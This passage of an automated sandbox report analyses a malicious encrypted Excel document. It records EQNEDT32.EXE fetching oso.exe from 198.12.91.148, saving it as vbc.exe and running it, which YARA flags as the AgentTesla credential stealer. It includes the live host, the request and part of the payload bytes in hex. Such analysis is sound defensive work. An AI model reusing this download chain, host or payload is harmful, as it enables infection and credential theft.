                        Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                        File Type:data
                        Stream Size:200
                        Entropy:3.13335930328
                        Base64 Encoded:False
                        Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                        Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                        General
                        Stream Path:\x6DataSpaces/Version
                        File Type:data
                        Stream Size:76
                        Entropy:2.79079600998
                        Base64 Encoded:False
                        Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                        Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                        Stream Path: EncryptedPackage, File Type: data, Stream Size: 1214360
                        General
                        Stream Path:EncryptedPackage
                        File Type:data
                        Stream Size:1214360
                        Entropy:7.9986477778
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . ? Q . C . . . S . N . A 0 . . . . . u . . * s N w . { . . h . . . . . . . . + . . ^ . . e / . . j . R ` . < R . . . . . . . z N . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ? . f * . . . ~ . . . . . . Z . ?
                        Data Raw:8b 87 12 00 00 00 00 00 3f 51 fe 43 fb 97 0e 53 de 4e 83 41 30 2e e8 8b c2 e4 75 d0 1d 2a 73 4e 77 b6 7b dd fc 68 c5 fb 90 ef 92 bf 80 e6 2b d4 ae 5e a0 fd 65 2f e8 de 6a df 52 60 e9 3c 52 f4 9a ad 82 fa b6 fb 7a 4e f3 1a d0 0b 8e 5a b7 3f f0 66 2a cb b1 a4 7e bf f3 1a d0 0b 8e 5a b7 3f f0 66 2a cb b1 a4 7e bf f3 1a d0 0b 8e 5a b7 3f f0 66 2a cb b1 a4 7e bf f3 1a d0 0b 8e 5a b7 3f
                        Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                        General
                        Stream Path:EncryptionInfo
                        File Type:data
                        Stream Size:224
                        Entropy:4.52818090397
                        Base64 Encoded:False
                        Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . h . H E ' . . . . . . H . . . . . . . . . . . . . \\ . . . . . . . . = . . . . . . " = . . { 1 . d . . . . = . . . n . . z . . .
                        Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 22, 2021 18:18:32.092925072 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.231482029 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.238130093 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.238163948 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.379816055 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.379856110 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.379901886 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.379926920 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.380024910 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.380171061 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.515589952 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.517291069 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.517352104 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.520431042 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.520452023 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.520454884 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.520554066 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.521085024 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.522749901 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.522883892 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.522895098 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.522968054 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.523175001 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.523191929 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.523194075 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.523236036 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663486004 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663535118 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663599968 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663626909 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663638115 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663659096 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663661957 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663665056 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663686037 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663708925 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663738966 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663759947 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663764954 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663769007 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663788080 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663810015 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663815022 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663820028 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663842916 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663866997 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663872957 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663877010 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663880110 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663898945 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663922071 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663924932 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663944960 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663968086 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.663974047 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.663978100 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.669609070 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.669631004 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.669634104 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800498962 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800537109 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800559998 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800585985 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800609112 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800631046 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800653934 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800677061 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800677061 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800698996 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800703049 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800707102 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800721884 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800723076 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800741911 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800745964 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800765991 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800771952 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800784111 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800795078 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800813913 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800817013 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800833941 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800841093 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800853014 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800863028 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800880909 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800885916 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800899982 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800909996 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800920010 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800932884 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800949097 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800961018 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.800968885 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.800983906 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801002026 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801007032 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801021099 CEST4916780192.168.2.22198.12.91.148
                        Jul 22, 2021 18:18:32.801029921 CEST8049167198.12.91.148192.168.2.22
                        Jul 22, 2021 18:18:32.801048040 CEST4916780192.168.2.22198.12.91.148

                        HTTP Request Dependency Graph

                        • 198.12.91.148

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.2249167198.12.91.14880C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        TimestampkBytes transferredDirectionData
                        Jul 22, 2021 18:18:32.238163948 CEST0OUTGET /oso.exe HTTP/1.1
                        Accept: */*
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: 198.12.91.148
                        Connection: Keep-Alive
                        Jul 22, 2021 18:18:32.379816055 CEST1INHTTP/1.1 200 OK
                        Date: Thu, 22 Jul 2021 16:18:32 GMT
                        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
                        Last-Modified: Thu, 22 Jul 2021 07:24:36 GMT
                        ETag: "f9800-5c7b12de621e5"
                        Accept-Ranges: bytes
                        Content-Length: 1021952
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/x-msdownload
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 1d f9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 32 0c 00 00 62 03 00 00 00 00 00 2e 51 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 10 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 50 0c 00 4b 00 00 00 00 80 0c 00 e8 5d 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 31 0c 00 00 20 00 00 00 32 0c 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 18 00 00 00 00 60 0c 00 00 02 00 00 00 36 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5d 03 00 00 80 0c 00 00 5e 03 00 00 38 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0f 00 00 02 00 00 00 96 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL+`2b.Q `@ @PK] H.text41 2 `.sdata`6@.rsrc]^8@@.reloc@B


                        Code Manipulations

                        Statistics

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Start time:18:17:44
                        Start date:22/07/2021
                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        Wow64 process (32bit):false
                        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                        Imagebase:0x13f910000
                        File size:27641504 bytes
                        MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:18:18:06
                        Start date:22/07/2021
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                        Imagebase:0x400000
                        File size:543304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:18:18:10
                        Start date:22/07/2021
                        Path:C:\Users\Public\vbc.exe
                        Wow64 process (32bit):true
                        Commandline:'C:\Users\Public\vbc.exe'
                        Imagebase:0xec0000
                        File size:1021952 bytes
                        MD5 hash:E8194372570D57749B3033E063BDC5D8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low

                        General

                        Start time:18:18:33
                        Start date:22/07/2021
                        Path:C:\Users\Public\vbc.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\Public\vbc.exe
                        Imagebase:0xec0000
                        File size:1021952 bytes
                        MD5 hash:E8194372570D57749B3033E063BDC5D8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >